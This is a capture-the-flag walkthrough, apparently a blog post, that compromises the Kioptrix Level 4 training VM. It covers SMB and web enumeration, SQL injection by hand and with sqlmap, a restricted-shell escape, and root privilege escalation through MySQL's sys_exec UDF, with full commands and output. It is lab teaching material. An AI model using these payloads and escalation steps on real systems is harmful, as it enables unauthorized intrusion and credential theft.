Part 4 of 5 of the kioptrix series. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Point of the game is to find a way to get root shell on the vulnerable machine. Link to downloading the Vm can be found here. Now lets get started!
NOTE: When extracting the VM. I was only given a vmdk (virtual machine disk) which gave me problems when trying to open it up with VMware. I used this guide called Create Workstation Virtual Machine Using Existing Virtual Disks to help me out.
Description from author:
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:
1. It’s possible to get root remotely [ Edit: sorry not what I meant ]
1a. It’s possible to remotely compromise the machine
Stays within the target audience of this site
Must be “realistic” (well kinda…)
Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.
I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.
Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.
I’d would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug
— A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the imagine to suit your fusion version.
— Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve test the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com
Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.
Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys
So I hope you enjoy this one.
The Kioptrix Team
**Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive**
Kali Linux machine
Scanning and Reconnaissance
Using the tool netdiscover, I found the victim VM to be 192.168.182.154
root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24
I then ran a SYN stealth scan on the target and found ports 22, 80, 139, and 445 open!
root@kali:~# nmap -sS -n 192.168.182.154 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-12 19:38 CDT Nmap scan report for 192.168.182.154 Host is up (0.00034s latency). Not shown: 566 closed ports, 430 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:68:B2:1F (VMware) Nmap done: 1 IP address (1 host up) scanned in 157.82 seconds root@kali:~#
Since ports 139/tcp and 445/tcp are open lets enumerate SMB and check to see if there is any shares open as well as usernames using enum4linux. Much output came from using enum4linux however I only displayed the useful info below.
root@kali:~# enum4linux 192.168.182.154
========================================= | OS information on 192.168.182.154 | ========================================= [+] Got OS info for 192.168.182.154 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a] [+] Got OS info for 192.168.182.154 from srvinfo: KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu) platform_id : 500 os version : 4.9 server type : 0x809a03 ================================ | Users on 192.168.182.154 | ================================ index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null) index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null) index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null) index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null) index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null) user:[nobody] rid:[0x1f5] user:[robert] rid:[0xbbc] user:[root] rid:[0x3e8] user:[john] rid:[0xbba] user:[loneferret] rid:[0xbb8] ============================================ | Share Enumeration on 192.168.182.154 | ============================================ Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a] Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu)) Server Comment --------- ------- KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu) Workgroup Master --------- ------- WORKGROUP KIOPTRIX4 [+] Attempting to map shares on 192.168.182.154 //192.168.182.154/print$ Mapping: DENIED, Listing: N/A //192.168.182.154/IPC$ [E] Can't understand response: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a] NT_STATUS_NETWORK_ACCESS_DENIED listing \*
Found that the victim is running Samba 3.0.28a(no public exploits available) and got 5 usernames from the enumeration! It also attempted to map the shares print$ and IPC$ but it didn’t work. Lets try using dirb to scan the victims website.
root@kali:~# dirb http://192.168.182.154 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Mar 12 21:29:00 2017 URL_BASE: http://192.168.182.154/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.182.154/ ---- + http://192.168.182.154/cgi-bin/ (CODE:403|SIZE:330) ==> DIRECTORY: http://192.168.182.154/images/ + http://192.168.182.154/index (CODE:200|SIZE:1255) + http://192.168.182.154/index.php (CODE:200|SIZE:1255) ==> DIRECTORY: http://192.168.182.154/john/ + http://192.168.182.154/logout (CODE:302|SIZE:0) + http://192.168.182.154/member (CODE:302|SIZE:220) + http://192.168.182.154/server-status (CODE:403|SIZE:335) ---- Entering directory: http://192.168.182.154/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.182.154/john/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sun Mar 12 21:29:03 2017 DOWNLOADED: 4612 - FOUND: 6 root@kali:~#
Found some useful stuff including a /john/ directory.
So checking the website, it has a login. Lets see if it’s vulnerable to an SQL injection by putting a comma
' in the username and password fields.
Well look what we have here! It is vulnerable to SQLi!!
I will be using 2 ways to get 2 login credentials to the server. The first will be a manual SQL injection and the second will be using sqlmap. Both will yield the same results. Just wanted to let you all know just so you don’t get confused or anything. Lets get started!
Lets try to do an injection using one of the usernames from the SMB enumeration. I’m going to start with user john because I also found the john directory when using dirb. I will input john in the username field and
1' or '1'='1 in the password field. Now the SQL query will something like this in the back end:
SELECT * FROM users where username='john' and password='1' or '1'='1'
It worked!! Got john’s credentials with the password being MyNameIsJohn
Did the same method with robert and got his credentials as well with his password being ADGAdsafdfwt4gadfga==
Note-You can skip to Escaping restricted shell to continue the pentest or go to SQLi using sqlmap to learn another method on how I got the credentials to the server.
SQLi using sqlmap
Well from output given from checking if the site was vulnerable to an SQLi and the checking the code from the login source below. It gives me enough info to perform an SQLi using sqlmap.
Using the command will give me the the databases running on the site.
root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL --data="myusername=username&mypassword=password" --level=5 --risk=3 --dbs
We have 3 databases. Lets check out what the database members has to offer by giving us the tables in the database using the command below.
root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL --data="myusername=username&mypassword=password" --level=5 --risk=3 --tables -D members
So the table in the database is members. Lets dump the info from the table and see what we get using the command below.
root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --data="myusername=username&mypassword=password" -D members -T members --dump
BINGO!! We got 2 valid login credentials that I will use to ssh into the server.
Escaping restricted shell
root@kali:~# ssh email@example.com firstname.lastname@example.org's password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ ? cd clear echo exit help ll lpath ls john:~$
As I log in, I noticed that I have a limited shell with only a few commands that I am allowed to run. Since I can run the command echo, I can easily “escape” and bypass the limited shell by using the command
john:~$ echo os.system('/bin/bash') john@Kioptrix4:~$ id uid=1001(john) gid=1001(john) groups=1001(john) john@Kioptrix4:~$
Once out of limited shell, I ran several commands to see if I could find anything interesting.
john@Kioptrix4:~$ cat /etc/*-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=8.04 DISTRIB_CODENAME=hardy DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS" john@Kioptrix4:~$ cat /proc/version Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009 john@Kioptrix4:~$ ps -ef | grep root root 1 0 0 Mar12 ? 00:00:01 /sbin/init root 2 0 0 Mar12 ? 00:00:00 [kthreadd] root 3 2 0 Mar12 ? 00:00:00 [migration/0] root 4 2 0 Mar12 ? 00:00:00 [ksoftirqd/0] root 5 2 0 Mar12 ? 00:00:00 [watchdog/0] root 6 2 0 Mar12 ? 00:00:00 [events/0] root 7 2 0 Mar12 ? 00:00:00 [khelper] root 41 2 0 Mar12 ? 00:00:00 [kblockd/0] root 44 2 0 Mar12 ? 00:00:00 [kacpid] root 45 2 0 Mar12 ? 00:00:00 [kacpi_notify] root 170 2 0 Mar12 ? 00:00:00 [kseriod] root 208 2 0 Mar12 ? 00:00:00 [pdflush] root 209 2 0 Mar12 ? 00:00:00 [pdflush] root 210 2 0 Mar12 ? 00:00:00 [kswapd0] root 252 2 0 Mar12 ? 00:00:00 [aio/0] root 1468 2 0 Mar12 ? 00:00:00 [ata/0] root 1471 2 0 Mar12 ? 00:00:00 [ata_aux] root 1480 2 0 Mar12 ? 00:00:00 [scsi_eh_0] root 1485 2 0 Mar12 ? 00:00:00 [scsi_eh_1] root 1498 2 0 Mar12 ? 00:00:00 [ksuspend_usbd] root 1503 2 0 Mar12 ? 00:00:00 [khubd] root 2359 2 0 Mar12 ? 00:00:00 [scsi_eh_2] root 2602 2 0 Mar12 ? 00:00:00 [kjournald] root 2769 1 0 Mar12 ? 00:00:00 /sbin/udevd --daemon root 3042 2 0 Mar12 ? 00:00:00 [kgameportd] root 3212 2 0 Mar12 ? 00:00:00 [kpsmoused] root 4501 1 0 Mar12 tty4 00:00:00 /sbin/getty 38400 tty4 root 4502 1 0 Mar12 tty5 00:00:00 /sbin/getty 38400 tty5 root 4507 1 0 Mar12 tty2 00:00:00 /sbin/getty 38400 tty2 root 4509 1 0 Mar12 tty3 00:00:00 /sbin/getty 38400 tty3 root 4518 1 0 Mar12 tty6 00:00:00 /sbin/getty 38400 tty6 root 4569 1 0 Mar12 ? 00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg root 4590 1 0 Mar12 ? 00:00:00 /usr/sbin/sshd root 4646 1 0 Mar12 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe root 4688 4646 0 Mar12 ? 00:00:16 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid root 4690 4646 0 Mar12 ? 00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld root 4763 1 0 Mar12 ? 00:00:00 /usr/sbin/nmbd -D root 4765 1 0 Mar12 ? 00:00:00 /usr/sbin/smbd -D root 4779 4765 0 Mar12 ? 00:00:00 /usr/sbin/smbd -D root 4780 1 0 Mar12 ? 00:00:00 /usr/sbin/winbindd root 4800 4780 0 Mar12 ? 00:00:00 /usr/sbin/winbindd root 4812 1 0 Mar12 ? 00:00:00 /usr/sbin/cron root 4834 1 0 Mar12 ? 00:00:00 /usr/sbin/apache2 -k start root 4890 1 0 Mar12 tty1 00:00:00 /sbin/getty 38400 tty1 root 4943 4780 0 Mar12 ? 00:00:00 /usr/sbin/winbindd root 4944 4780 0 Mar12 ? 00:00:00 /usr/sbin/winbindd root 5752 4590 0 01:07 ? 00:00:00 sshd: john [priv] john 5901 5807 0 02:26 pts/0 00:00:00 grep root john@Kioptrix4:~$
I can see that MySQL is running with root privileges. Since I have ssh access to the machine lets see if I find the database credentials by accessing the configuration files.
john@Kioptrix4:~$ ls /var/www/ checklogin.php database.sql images index.php john login_success.php logout.php member.php robert john@Kioptrix4:~$
Well looks like there is no password needed to access the database. What I will be attempting is since we have root access on MySQL we can execute commands(on the operating system itself) using User Defined Functions. In short, because we can access MySQL server as root, we will escalate our privileges to root using User Defined Functions. In order to perform these commands we need to make sure lib_mysqludf_sys.so is on the server. Using the whereis command I discovered that it was already installed on the server.
john@Kioptrix4:~$ whereis lib_mysqludf_sys.so lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so john@Kioptrix4:~$
Lets access the MySQL server. Looked up these tutorials which helped me out with understanding MySQL UDF more. MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux and Command execution with a MySQL UDF
john@Kioptrix4:~$ mysql -h localhost -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 98586 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> select sys_exec('usermod -a -G admin john'); +--------------------------------------+ | sys_exec('usermod -a -G admin john') | +--------------------------------------+ | NULL | +--------------------------------------+ 1 row in set (0.08 sec) mysql> exit Bye john@Kioptrix4:~$ sudo su [sudo] password for john: root@Kioptrix4:/home/john# whoami root root@Kioptrix4:/home/john# id uid=0(root) gid=0(root) groups=0(root) root@Kioptrix4:/home/john# hostname Kioptrix4 root@Kioptrix4:/home/john#
Using sys_exec I was able to run usermod which added john to the admin group and then ran sudo su to get the root shell.
This was tougher than the previous level but when it got tough, I used the university of google (google) for some additional help. Did several exploitations which in turn got me access to the server and then had to use MySQL to do privilege escalation to get our desired root shell. If you had any questions on anything or enjoyed the read, leave some feedback below! Well that’s it for this level. Now on to the last one!